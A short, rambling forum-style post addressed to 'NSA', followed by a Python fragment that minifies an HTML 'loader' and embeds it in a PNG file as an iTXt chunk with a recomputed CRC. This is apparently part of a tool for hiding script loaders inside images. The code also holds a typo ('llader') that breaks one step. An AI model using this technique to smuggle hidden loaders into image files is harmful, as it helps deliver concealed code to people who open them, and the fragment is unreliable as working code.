Ok, NSA, very very much ungrateful being at this level of computing, and special having no God damm effect over the "system" for the simplest reason, nobody here, understands shit about it! So, because we are here , in a very specific tribe...and I don't hv money for a cup of strawberries...check the next code
print("[*] Minifying loader html")
loader = re.sub("\n[\s]*", '', loader)
loader = re.sub("[\s]*=[\s]*", '=', loader)
loader = re.sub("[\s]*}[\s]*", '}', loader)
llader = re.sub("[\s]*{[\s]*", '{', loader)
print("[*] Writing iTXt chunk containing loader")
itxt_content_length = struct.pack(">i", len(loader)).encode('hex')
itxt_content = 'iTXt'.encode('hex') + loader.encode('hex')
itxt_crc = struct.pack(">i", binascii.crc32(itxt_content)).encode('hex')
o.write(binascii.unhexlify(itxt_content_length + itxt_content + itxt_crc))
print("[*] Writing the remaining data")
o.write(binascii.unhexlify(''.join(hex_array[8 + ihdr_length:])))
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